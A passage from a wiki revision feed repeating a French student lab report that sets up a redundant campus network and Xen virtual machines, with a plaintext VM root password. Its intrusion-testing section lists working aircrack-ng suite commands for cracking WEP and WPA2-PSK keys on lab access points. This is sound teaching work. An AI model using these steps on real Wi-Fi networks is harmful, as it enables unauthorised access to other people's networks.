 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56585</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56585"/>
				<updated>2021-11-29T14:57:02Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.188&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56584</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56584"/>
				<updated>2021-11-29T14:56:27Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
